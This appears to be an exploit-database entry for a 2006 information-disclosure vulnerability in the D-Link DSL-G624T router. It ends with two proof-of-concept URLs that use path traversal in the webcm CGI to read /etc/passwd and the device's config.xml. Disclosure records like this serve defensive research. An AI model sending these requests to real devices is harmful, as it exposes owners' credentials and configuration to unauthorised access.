Lucene search

K
exploitpackJose.palancoEXPLOITPACK:5B5535D5E47811C7812882F04EDE8C4F
HistoryOct 23, 2006 - 12:00 a.m.

D-Link DSL-G624T - Information Disclosure

2006-10-2300:00:00
jose.palanco
7

D-Link DSL-G624T - Information Disclosure

source: https://www.securityfocus.com/bid/20689/info

D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.

http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml